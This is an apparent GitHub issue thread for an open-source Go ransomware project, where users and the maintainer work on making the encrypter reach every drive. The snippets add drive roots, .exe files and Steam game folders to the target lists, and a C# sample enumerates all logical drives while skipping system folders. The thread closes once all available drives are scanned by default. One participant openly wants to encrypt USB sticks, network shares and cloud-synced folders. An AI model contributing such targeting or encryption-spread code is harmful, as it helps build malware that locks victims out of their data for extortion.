Scan Sub directories and Drives. about ransomware HOT 22 CLOSED

1 - I will investigate this behavior

2- The unlocker is compiled with the malware so both share the same cmd variables, including the InterestingDirs, so an unlocker will be useful only with the respective encrypter

from ransomware.

This is a request for feature that can also search directories and files in other drives like E, F, Z etc. and encrypt it. rather than providing the full path of the folders, can it be use to search the files extensions in Other windows drives?
2- Also search and encrypt/decrypt files extensions in other available drives.

from ransomware.

I don't test it but I think you can specify custom drivers directly on the InterestingDirs variable. Internally I use filepath.Walk to match files on dirs and subdirs

from ransomware.

when EDrive = fmt.Sprintf("E:\\newfolder")
This will do the job in E drive newfolder only.. but i want it to do job in whole E:\ drive without providing any folder name.
if i do like EDrive = fmt.Sprintf("E:\\") it doesn't work.
is there is anyway to do job in whole drive without providing folder names ?

from ransomware.

From the filepath.Walk documentation

func Walk(root string, walkFn WalkFunc) error
Walk walks the file tree rooted at root, calling walkFn for each file or directory in the tree, including root. All errors that arise visiting files and directories are filtered by walkFn. The files are walked in lexical order, which makes the output deterministic but means that for very large directories Walk can be inefficient. Walk does not follow symbolic links.

It's supposed to work 😕

from ransomware.

@justuandme Try this:

// Directories to walk searching for files
InterestingDirs = []string{
    UserDir + "Pictures",
    UserDir + "Documents",
    UserDir + "Music",
    UserDir + "Desktop",
    UserDir + "Downloads",
    UserDir + "Videos",
    "E:\\",
}

from ransomware.

Great This work now! 👯‍♂️

from ransomware.

now its not working on same VM after i revert and ran the same ransom binary.
it shows this error.

2016/10/14 11:04:31 rename C:\Users\Test\AppData\Local\Temp\263942.jpg E:\fdasdfsafaffasgjsjd\263942.jpg: The system cannot move the file to a different disk
drive.

but the files are there at there paths.

from ransomware.

This error is supposed to be thrown on unix systems only 😕
But I think this is related here

I will fix this as soon as possible

Thanks for your reports

from ransomware.

Hello,

Please check this : Loop through files and folders recursively

https://gist.github.com/francoishill/a5aca2a7bd598ef5b563

and get it combined with something like :
C#

foreach (string drive in Directory.GetLogicalDrives())

{

//call to Loop through files and folders recursively , and add found files to List ( list can be filtered for specific extensions like the code below.

}

also, i think is better to add a filter with black listed directories which we do not need like windows, program files, recovery ... etc

in C# i do it like this :

        static List<string> blacklist = new List<string>()
            {
                 "$Recycle.Bin", "Documents and Settings", "Program Files", "Program Files (x86)", "ProgramData", "Recovery"
            };

................

IEnumerator<DirectoryInfo> dirs;
            try
            {
                dirs = top_directory.EnumerateDirectories("*").Where(d =>
                !d.Name.Contains(blacklist[0]) &&
                !d.Name.Contains(blacklist[1]) &&
                !d.Name.Contains(blacklist[2]) &&
                !d.Name.Contains(blacklist[3]) &&
                !d.Name.Contains(blacklist[4]) &&
                !d.Name.Contains(blacklist[5])).GetEnumerator();
            }

I'm more into C#, hope this helps

from ransomware.

Hello,
im not good in GoLang nor C#...lets mauri finds it.
but i think we dont need to restrict or define folder names in C drive instead
mauri already provided some C drive paths where to encrypt.
btw i think we don't restrict some programs in "Program Files"
encrypt some steam games too xD

SteamEncrypt = fmt.Sprintf("C:\\$ProgramFilesDir")

// Directories to walk searching for files
    InterestingDirs = []string{
        UserDir + "Pictures",
        UserDir + "Documents",
        UserDir + "Music",
        UserDir + "Desktop",
        UserDir + "Downloads",
        UserDir + "Videos",
        SteamEncrypt + "\\Steam\\steamapps\\common",
    }

Add exe in extentions

    // Interesting extensions to match files
    InterestingExtensions = []string{
        // Text Files
        "doc", "docx", "msg", "odt", "wpd", "wps", "txt",
        ...........................................
        // SteamEncrypt & UserProfile Paths any exe encrypt.
        "exe"
}

Moreover you can encrypt all files stored on Usb Drives/sticks, Externals Disks, Internal Disks, Onedrive, Dropbox, Google Drive, Network drives, Network Shares.

from ransomware.

@justuandme steam games and saves are not saved as .exe in the programs folder, encrypting the game.exe or steam.exe is useless.

the C# code i wrote above scans all drives not only the C, also it is a bad idea to use hard-coded value C as you mentioned above "SteamEncrypt" , what if the OS is not installed in C drive ? 😉

from ransomware.

@hanoosh
the hard-coded value is just an example that is not the correct code, if you see my previous post above. i have asked for something like which start loop and scan all the drives.. A-Z and then start encrypting.

whatever the extension steam games uses we can add that extension. i m making list of huge amount of extensions, will check what steam games extensions are and will post it here soon.

from ransomware.

Hi guys, sorry for the delay

About this error:

2016/10/14 11:04:31 rename C:\Users\Test\AppData\Local\Temp\263942.jpg E:\fdasdfsafaffasgjsjd\263942.jpg: The system cannot move the file to a different disk
drive.

The temporary file is created on AppData\Local\Temp on the System drive (C in most cases). For performance reasons I use the os.Rename to copy the temp file to the original file but on windows we cannot rename a file across drives 😞

I think I'll have to open the two files and copy them via stream (io.Copy)

from ransomware.

@justuandme Feel free to fork and add more extensions to match ;)

from ransomware.

@mauri870 any changes so far ? did you check with all drives ?

from ransomware.

Hi @justuandme. This error:

2016/10/14 11:04:31 rename C:\Users\Test\AppData\Local\Temp\263942.jpg E:\fdasdfsafaffasgjsjd\263942.jpg: The system cannot move the file to a different disk
drive.

is fixed here

About scan drives, it's not implemented yet because are multiple folder that we need ignore otherwise will cause system instability and crashes.

For now you can specify drives manually

from ransomware.

i specified drive letter manually... i specified all letters from A-Z but it crashes on scanning the valid one.
is there is any way to find the total number of drives ? and scan those for files..?

from ransomware.

@justuandme You can use this examples

from ransomware.

@mauri870 i have used this example before, but didn't work for me.
im not GoPro :( can u merge it or show me how to implement it.

from ransomware.

Hi @justuandme , sorry for the delay. I will add options for exclude dirs in the future.

About identify the available drives, it's more complicated because we need load the kernel32.dll, this will add more stuff to the project rather than the actual simple string slice. I will think more about this

from ransomware.

I'll close this issue since now we can loop all available drives by default

from ransomware.